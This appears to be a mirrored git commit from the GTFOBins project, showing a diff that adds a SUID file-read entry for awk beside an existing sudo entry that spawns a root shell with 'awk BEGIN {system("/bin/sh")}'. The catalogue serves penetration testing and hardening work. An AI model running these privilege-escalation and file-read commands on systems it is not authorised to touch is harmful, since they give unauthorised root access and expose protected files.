1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-01-27 02:28:02 +01:00

Add SUID category to awk

This commit is contained in:
Shikata 2021-01-12 13:39:52 +02:00
parent a48303c2b9
commit fd719bb4b6

@ -27,6 +27,10 @@ functions:
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
suid:
- code: |
LFILE=file_to_read
awk '//' "$LFILE"
sudo:
- code: sudo awk 'BEGIN {system("/bin/sh")}'
limited-suid: